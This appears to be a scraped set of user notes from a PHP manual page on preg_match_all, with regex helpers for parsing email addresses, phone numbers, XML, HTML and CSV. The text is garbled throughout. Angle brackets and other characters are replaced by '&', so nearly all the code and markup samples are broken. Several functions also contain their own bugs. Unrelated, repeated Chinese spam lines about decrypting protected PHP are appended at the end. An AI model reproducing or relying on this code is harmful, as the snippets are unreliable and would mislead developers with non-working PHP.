& & & & = "[\\x01-\\x08\\x0B\\x0C\\x0E-\\x1F!#-[\\]-\\x7F]";& & & & $qcontent& & && = "(?:$qtext|$quoted_pair)";& & & & $quoted_string& = "(?:$cfws?\"(?:$fws?$qcontent)*$fws?\"$cfws?)";& & & & $dtext& & & & & = "[\\x01-\\x08\\x0B\\x0C\\x0E-\\x1F!-Z\\^-\\x7F]";& & & & $dcontent& & && = "(?:$dtext|$quoted_pair)";& & & & $domain_literal = "(?:$cfws?\\[(?:$fws?$dcontent)*$fws?]$cfws?)";& & & & $domain& & & && = "(?:$dot_atom|$domain_literal)";& & & & $local_part& && = "(?:$dot_atom|$quoted_string)";& & & & $addr_spec& & & = "($local_part@$domain)";& & & & $display_name&& = "(?:(?:$atom|$quoted_string)+)";& & & & $angle_addr& && = "(?:$cfws?&$addr_spec&$cfws?)";& & & & $name_addr& & & = "(?:$display_name?$angle_addr)";& & & & $mailbox& & & & = "(?:$name_addr|$addr_spec)";& & & & $mailbox_list&& = "(?:(?:(?:(?&=:)|,)$mailbox)+)";& & & & $group& & & & & = "(?:$display_name:(?:$mailbox_list|$cfws)?;$cfws?)";& & & & $address& & & & = "(?:$mailbox|$group)";& & & & $address_list&& = "(?:(?:^|,)$address)+";& & & & echo(strlen($address_list) . " ");& & & & preg_match_all("/^$address_list$/", $string, $array, PREG_SET_ORDER);& & & & return $array;};?&
This is a function to convert byte offsets into (UTF-8) character offsets (this is reagardless of whether you use /u modifier:&?phpfunction mb_preg_match_all($ps_pattern, $ps_subject, &$pa_matches, $pn_flags = PREG_PATTERN_ORDER, $pn_offset = 0, $ps_encoding = NULL) {& if (is_null($ps_encoding))& & $ps_encoding = mb_internal_encoding();& $pn_offset = strlen(mb_substr($ps_subject, 0, $pn_offset, $ps_encoding));& $ret = preg_match_all($ps_pattern, $ps_subject, $pa_matches, $pn_flags, $pn_offset);& if ($ret && ($pn_flags & PREG_OFFSET_CAPTURE))& & foreach($pa_matches as &$ha_match)& & & foreach($ha_match as &$ha_match)& & & & $ha_match[1] = mb_strlen(substr($ps_subject, 0, $ha_match[1]), $ps_encoding);& & return $ret;& }?&
i have made up a simple function to extract a number from a string..
I am not sure how good it is, but it works.
It gets only the numbers 0-9, the "-", " ", "(", ")", "."
characters.. This is as far as I know the most widely used characters for a Phone number.
&?php
function clean_phone_number($phone) {
& & && if (!empty($phone)) {
& & & & & & && preg_match_all('/[0-9+.\- ]/s', $phone, $cleaned);
& & & & & & && foreach($cleaned[0] as $k=&$v) {
& & & & & & & & & & && $ready .= $v;
& & & & & & && }
& & & & & & && var_dump($ready);
& & & & & & &&
& & & & & & && if (mb_strlen($cleaned) & 4 && mb_strlen($cleaned) &=25) {
& & & & & & & & & & && return $cleaned;
& & & & & & && }
& & & & & & && else {
& & & & & & & & & & && return false;
& & & & & & && }
& & && }
& & && return false;
}
?&
I found simpleXML to be useful only in cases where the XML was extremely small, otherwise the server would run out of memory (I suspect there is a memory leak or something?). So while searching for alternative parsers, I decided to try a simpler approach. I don't know how this compares with cpu usage, but I know it works with large XML structures. This is more a manual method, but it works for me since I always know what structure of data I will be receiving.
Essentially I just preg_match() unique nodes to find the values I am looking for, or I preg_match_all to find multiple nodes. This puts the results in an array and I can then process this data as I please.
I was unhappy though, that preg_match_all() stores the data twice (requiring twice the memory), one array for all the full pattern matches, and one array for all the sub pattern matches. You could probably write your own function that overcame this. But for now this works for me, and I hope it saves someone else some time as well.
// SAMPLE XML
&RETS ReplyCode="0" ReplyText="Operation Successful"&
& &COUNT Records="14" /&
& &DELIMITER value="09" /&
& &COLUMNS&PropertyID&/COLUMNS&
& &DATA&521897&/DATA&
& &DATA&677208&/DATA&
& &DATA&686037&/DATA&
&/RETS&
function parse_xml($xml) {
& &
& & $match_res = preg_match('/&DELIMITER value ?= ?"(.*)" ?\/&/', $xml, $matches);
& & if(!empty($matches[1])) {
& & & & $results["delimiter"] = chr($matches[1]);
& & } else {
& & & & $results["delimiter"] = "\t";
& & }
& & unset($match_res, $matches);
& &
& & $results["data_count"] = preg_match_all("/&DATA&(.*)&\/DATA&/", $xml, $matches);
& & $results["data"]=$matches[1];
& & unset($match_res, $matches);
& &
& & unset($xml);
& & return $results;
& &
PREG_OFFSET_CAPTURE always seems to provide byte offsets, rather than character position offsets, even when you are using the unicode /u modifier.
Using preg_match_all I made a pretty handy function.
function reg_smart_replace($pattern, $replacement, $subject, $replacementChar = "$$$", $limit = -1)
{
& & if (! $pattern || ! $subject || ! $replacement ) { return false; }
& &
& & $replacementChar = preg_quote($replacementChar);
& &
& & preg_match_all ( $pattern, $subject, $matches);
& &
& & if ($limit & -1) {
& & & & foreach ($matches as $count =& $value )
& & & & {
& & & & & & if ($count + 1 & $limit ) { unset($matches[$count]); }
& & & & }
& & }
& & foreach ($matches[0] as $match) {
& & & & $rep = ereg_replace($replacementChar, $match, $replacement);
& & & & $subject = ereg_replace($match, $rep, $subject);
& & }
& &
& & return $subject;
}
?&
This function can turn blocks of text into clickable links or whatever.& Example:
&?php
reg_smart_replace(EMAIL_REGEX, '&a href=""&$$$&/a&', $description)
?&
will turn all email addresses into actual links.
Just substitute $$$ with the text that will be found by the regex.& If you can't use $$$ then use the 4th parameter $replacementChar
Be careful with this pattern match and large input buffer on preg_match_* functions.&?php$pattern = '/\{(?:[^{}]|(?R))*\}/';preg_match_all($pattern, $buffer, $matches); ?&if $buffer is 80+ KB in size, you'll end up with segfault! [] php[4384]: segfault at 7ffd6e2bdeb0 ip 0d67ed sp 00007ffd6e2bde70 error 6 in libpcre.so.3.13.1[7fa20c8c]This is due to the PCRE recursion. This is a known bug in PHP since 2008, but it's source is not PHP itself but PCRE library. Rasmus Lerdorf has the answer: "The problem here is that there is no way to detect run-away regular expressions here without huge performance and memory penalties. Yes, we could build PCRE in a way that it wouldn't segfault and we could crank up the default backtrack limit to something huge, but it would slow every regex call down by a lot. If PCRE provided a way to handle this in a more graceful manner without the performance hit we would of course use it."
I had been crafting and testing some regexp patterns online using the tools Regex101 and a `preg_match_all()` tester and found that the regexp patterns I wrote worked fine on them, just not in my code.My problem was not double-escaping backslash characters:&?php$input = "\"something\",\"something here\",\"some\nnew\nlines\",\"this is the end\"";preg_match_all( "/(?:,|^)(?&!\\)\".*?(?&!\\)\"(?:(?=,)|$)/s", $input, $matches );preg_match_all( "/(?:,|^)(?&!\\\\)\".*?(?&!\\\\)\"(?:(?=,)|$)/s", $input, $matches );?&
Here is a awesome online regex editor which helps you test your regular expressions (prce, js, python) with real-time highlighting of regex match on data input.
// Here is function that allows you to preg_match_all array of pattersfunction getMatches($pattern, $subject) {& & $matches = array();& & if (is_array($pattern)) {& & & & foreach ($pattern as $p) {& & & & & & $m = getMatches($p, $subject);& & & & & & foreach ($m as $key =& $match) {& & & & & & & & if (isset($matches[$key])) {& & & & & & & & & & $matches[$key] = array_merge($matches[$key], $m[$key]);& & & & & & & & & & } else {& & & & & & & & & & $matches[$key] = $m[$key];& & & & & & & & }& & & & & & }& & & & }& & } else {& & & & preg_match_all($pattern, $subject, $matches);& & }& & return $}$patterns = array(& & '/&span&(.*?)&\/span&/',& & '/&a href=".*?"&(.*?)&\/a&/');$html = '&span&some text&/span&';$html .= '&span&some text in another span&/span&';$html .= '&a href="path/"&here is the link&/a&';$html .= '&address&address is here&/address&';$html .= '&span&here is one more span&/span&';$matches = getMatches($patterns, $html);print_r($matches); // result is below/*Array(& & [0] =& Array& & & & (& & & & & & [0] =& &span&some text&/span&& & & & & & [1] =& &span&some text in another span&/span&& & & & & & [2] =& &span&here is one more span&/span&& & & & & & [3] =& &a href="path/"&here is the link&/a&& & & & )& & [1] =& Array& & & & (& & & & & & [0] =& some text& & & & & & [1] =& some text in another span& & & & & & [2] =& here is one more span& & & & & & [3] =& here is the link& & & & ))*/
This is very useful to combine matches:$a = array_combine($matches[1], $matches[2]);
is a& php based online regex editor which helps you test your regular expressions with real-time highlighting of regex match on data input.
Better use preg_replace to convert text in a clickable link with tag &a& $html = preg_replace('"\b(\S+)"', '&a href="$1"&$1&/a&', $text);
Extract fields out of csv string : ( since before php5.3 you can't use str_getcsv function )
Here is the regex :
$csvData = &&&EOF
10,'20',"30","'40","'50'","\"60","70,80","09\\/18,/\"2011",'a,sdfcd'
EOF
$reg = &&&EOF
/
& & (
& & & & (
& & & & & & ([\'\"])
& & & & & & (
& & & & & & && (
& & & & & & & & [^\'\"]
& & & & & & & & |
& & & & & & & & (\\\\.)
& & & & & & && )*
& & & & & & )
& & & & & & (\\3)
& & & & & & |
& & & & & & (
& & & & & & & & [^,]
& & & & & & & & |
& & & & & & & & (\\\\.)
& & & & & & )*
& & ),)
& & /x
EOF;
preg_match_all($reg,$csvData,$matches);
print_r($matches[2]);
?&
I have received complains, that my html2a() code (see below) doesn't work in some cases. It is however not the problem with algorithm or procedure, but with PCRE recursive stack limits.If you use recursive PCRE (?R) you should remember to increase those two ini settings:ini_set('pcre.backtrack_limit', );ini_set('pcre.recursion_limit', );But be warned: (from php.ini);Please note that if you set this value to a high number you may consume all;the available process stack and eventually crash PHP (due to reaching the;stack size limit imposed by the Operating System).I have written this example mainly to demonstrate the power of PCRE LANGUAGE, not the power of it's implementation& :) But if you like it, use it, of course on your own risk.
The power of pregs is limited only by your *imagination* :)I wrote this html2a() function using preg recursive match (?R) which provides quite safe and bulletproof html/xml extraction:&?phpfunction html2a ( $html ) {& if ( !preg_match_all( '@\&\s*?(\w+)((?:\b(?:\'[^\']*\'|"[^"]*"|[^\&])*)?)\&((?:(?&[^\&]*)|(?R))*)\&\/\s*?\\1(?:\b[^\&]*)?\&|\&\s*(\w+)(\b(?:\'[^\']*\'|"[^"]*"|[^\&])*)?\/?\&@uxis', $html = trim($html), $m, PREG_OFFSET_CAPTURE | PREG_SET_ORDER) )& & return $html;& $i = 0;& $ret = array();& foreach ($m as $set) {& & if ( strlen( $val = trim( substr($html, $i, $set[0][1] - $i) ) ) )& & & $ret[] = $val;& & $val = $set[1][1] & 0 & & & ? array( 'tag' =& strtolower($set[4][0]) )& & & : array( 'tag' =& strtolower($set[1][0]), 'val' =& html2a($set[3][0]) );& & if ( preg_match_all( '/(\w+)\s*(?:=\s*(?:"([^"]*)"|\'([^\']*)\'|(\w+)))?/usix', isset($set[5]) && $set[2][1] & 0& ? $set[5][0]& : $set[2][0]& ,$attrs, PREG_SET_ORDER ) ) {& & & foreach ($attrs as $a) {& & & & $val['attr'][$a[1]]=$a[count($a)-1];& & & }& & }& & $ret[] = $val;& & $i = $set[0][1]+strlen( $set[0][0] );& }& $l = strlen($html);& if ( $i & $l )& & if ( strlen( $val = trim( substr( $html, $i, $l - $i ) ) ) )& & & $ret[] = $val;& return $ret;}?&Now let's try it with this example: (there are some really nasty xhtml compliant bugs, but ... we shouldn't worry)&?php$html = &&&EOTsome leftover text...& && & DIV class=noCompliant style = "text-align:" &... and some other ...& dIv & & empty&& &/ empty&& &p& This is yet another text &br& && && that wasn't &b&compliant&/b& too... &br&& /&& && &/p& &div class="noClass" & this one is better but we don't care anyway &/div &&P&& & &input&& type= "text"& name ='my "name' value& = "nothin really." readonly&end of paragraph &/p& &/Div&&& &/div&&& some trailing text EOT;$a = html2a($html);echo a2html($a);function a2html ( $a, $in = "" ) {& if ( is_array($a) ) {& & $s = "";& & foreach ($a as $t)& & & if ( is_array($t) ) {& & & & $attrs=""; & & & & if ( isset($t['attr']) )& & & & & foreach( $t['attr'] as $k =& $v )& & & & & & $attrs.=" ${k}=".( strpos( $v, '"' )!==false ? "'$v'" : "\"$v\"" );& & & & $s.= $in."&".$t['tag'].$attrs.( isset( $t['val'] ) ? "&\n".a2html( $t['val'], $in."& " ).$in."&/".$t['tag'] : "/" )."&\n";& & & } else& & & & $s.= $in.$t."\n";& } else {& & $s = empty($a) ? "" : $in.$a."\n";& }& return $s;}?&This produces:some leftover text...&div class="noCompliant" style="text-align:"&& ... and some other ...& &div&& & &empty&& & &/empty&& & &p&& & & This is yet another text& & & &br/&& & & that wasn't& & & &b&& & & & compliant& & & &/b&& & & too...& & & &br/&& & &/p&& & &div class="noClass"&& & & this one is better but we don't care anyway& & &/div&& & &p&& & & &input type="text" name='my "name' value="nothin really." readonly="readonly"/&& & & end of paragraph& & &/p&& &/div&&/div&some trailing text
Here is a way to match everything on the page, performing an action for each match as you go. I had used this idiom in other languages, where its use is customary, but in PHP it seems to be not quite as common.&?phpfunction custom_preg_match_all($pattern, $subject){& & $offset = 0;& & $match_count = 0;& & while(preg_match($pattern, $subject, $matches, PREG_OFFSET_CAPTURE, $offset))& & {& & & & $match_count++;& & & & & & $match_start = $matches[0][1];& & & & $match_length = strlen(matches[0][0]);& & & & foreach($matches as $k =& $match) $newmatches[$k] = $match[0];& & & & $matches = $new_matches;& & & & & & echo "Match number $match_count, at byte offset $match_start, $match_length bytes long: ".$matches[0]."\r\n";& & & & & & & & & & $offset = $match_start + $match_length;& & }& & return $match_count;}?&Note that the offsets returned are byte values (not necessarily number of characters) so you'll have to make sure the data is single-byte encoded. (Or have a look at paolo mosna's strByte function on the strlen manual page).I'd be interested to know how this method performs speedwise against using preg_match_all and then recursing through the results.
Perhaps you want to find the positions of all anchor tags.& This will return a two dimensional array of which the starting and ending positions will be returned.&?phpfunction getTagPositions($strBody){& & define(DEBUG, false);& & define(DEBUG_FILE_PREFIX, "/tmp/findlinks_");& & & & preg_match_all("/&[^&]+&(.*)&\/[^&]+&/U", $strBody, $strTag, PREG_PATTERN_ORDER);& & $intOffset = 0;& & $intIndex = 0;& & $intTagPositions = array();& & foreach($strTag[0] as $strFullTag) {& & & & if(DEBUG == true) {& & & & & & $fhDebug = fopen(DEBUG_FILE_PREFIX.time(), "a");& & & & & & fwrite($fhDebug, $fulltag."\n");& & & & & & fwrite($fhDebug, "Starting position: ".strpos($strBody, $strFullTag, $intOffset)."\n");& & & & & & fwrite($fhDebug, "Ending position: ".(strpos($strBody, $strFullTag, $intOffset) + strlen($strFullTag))."\n");& & & & & & fwrite($fhDebug, "Length: ".strlen($strFullTag)."\n\n");& & & & & & fclose($fhDebug);& & & & }& & & & $intTagPositions[$intIndex] = array('start' =& (strpos($strBody, $strFullTag, $intOffset)), 'end' =& (strpos($strBody, $strFullTag, $intOffset) + strlen($strFullTag)));& & & & $intOffset += strlen($strFullTag);& & & & $intIndex++;& & }& & return $intTagPositions;}$strBody = 'I have lots of &a href=""&links&/a& on this &a href=""&page&/a& that I want to &a href=""&find&/a& the positions.';$strBody = strip_tags(html_entity_decode($strBody), '&a&');$intTagPositions = getTagPositions($strBody);print_r($intTagPositions);?&
please note, that the function of "mail at SPAMBUSTER at milianw dot de" can result in invalid xhtml in some cases. think i used it in the right way but my result is sth like this:&img src="./img.jpg" alt="nice picture" /&foo foo foo foo &/img&correct me if i'm wrong. i'll see when there's time to fix that. -.-
If you'd like to include DOUBLE QUOTES on a regular expression for use with preg_match_all, try ESCAPING THRICE, as in: \\\"For example, the pattern:'/&table&[\s\w\/&&=\\\"]*&\/table&/'Should be able to match:&table&&row&&col align="left" valign="top"&a&/col&&col align="right" valign="bottom"&b&/col&&/row&&/table&.. with all there is under those table tags.I'm not really sure why this is so, but I tried just the double quote and one or even two escape characters and it won't work. In my frustration I added another one and then it's cool.
As I intended to create for my own purpose a clean PHP class to act on XML files, combining the use of DOM and simplexml functions, I had that small problem, but very annoying, that the offsets in a path is not numbered the same in both.
That is to say, for example, if i get a DOM xpath object it appears like:
/ANODE/ANOTHERNODE/SOMENODE[9]/NODE[2]
and as a simplexml object would be equivalent to:
ANODE-&ANOTHERNODE-&SOMENODE[8]-&NODE[1]
So u see what I mean? I used preg_match_all to solve that problem, and finally I got this after some hours of headlock (as I'm french the names of variables are in French sorry), hoping it could be useful to some of you:
&?php
function decrease_string($string)
& & {
& & & & preg_match_all("/[0-9]+/",$chaine,$out,PREG_OFFSET_CAPTURE);
& & & & & & for($i=0;$i&sizeof($out[0]);$i++)
& & & & & & {
& & & & & & & & $longueurnombre = strlen((string)$out[0][$i][0]);
& & & & & & & & $taillechaine = strlen($chaine);
& & & & & & & & $debut = substr($chaine,0,$out[0][$i][1]);
& & & & & & & & $milieu = ($out[0][$i][0])-1;
& & & & & & & & $fin = substr($chaine,$out[0][$i][1]+$longueurnombre,$taillechaine);
& & & & & & & && if(preg_match('#[1][0]+$#', $out[0][$i][0]))
& & & & & & & && {
& & & & & & & & & & for($j = $i+1;$j&sizeof($out[0]);$j++)
& & & & & & & & & & {
& & & & & & & & & & & & $out[0][$j][1] = $out[0][$j][1] -1;
& & & & & & & & & & }
& & & & & & & && }
& & & & & & & & $chaine = $debut.$milieu.$fin;
& & & & & & }
& & & & return $chaine;
& & }
?&
The next function works with almost any complex xml/xhtml string
&?php
function close_tags($text) {
& & $patt_open& & = "%((?&!&/)(?&=&)[\s]*[^/!&\s]+(?=&|[\s]+[^&]*[^/]&)(?!/&))%";
& & $patt_close& & = "%((?&=&/)([^&]+)(?=&))%";
& & if (preg_match_all($patt_open,$text,$matches))
& & {
& & & & $m_open = $matches[1];
& & & & if(!empty($m_open))
& & & & {
& & & & & & preg_match_all($patt_close,$text,$matches2);
& & & & & & $m_close = $matches2[1];
& & & & & & if (count($m_open) & count($m_close))
& & & & & & {
& & & & & & & & $m_open = array_reverse($m_open);
& & & & & & & & foreach ($m_close as $tag) $c_tags[$tag]++;
& & & & & & & & foreach ($m_open as $k =& $tag)& & if ($c_tags[$tag]--&=0) $text.='&/'.$tag.'&';
& & & & & & }
& & & & }
& & }
& & return $text;
}
?&
&?phpfunction findinside($start, $end, $string) {& & & & preg_match_all('/' . preg_quote($start, '/') . '([^\.)]+)'. preg_quote($end, '/').'/i', $string, $m);& & & & return $m[1];& & }& & & & $start = "mary has";& & $end = "lambs.";& & $string = "mary has 6 lambs. phil has 13 lambs. mary stole phil's lambs. now mary has all the lambs.";& & $out = findinside($start, $end, $string);& & print_r ($out);?&

php神盾解密怎么使用splitword.php

我要回帖

更多关于 php源码怎么使用的文章

随机推荐

php神盾解密 怎么使用splitword.php

我要回帖

更多关于 php源码怎么使用 的文章

随机推荐

php神盾解密怎么使用splitword.php

更多关于 php源码怎么使用的文章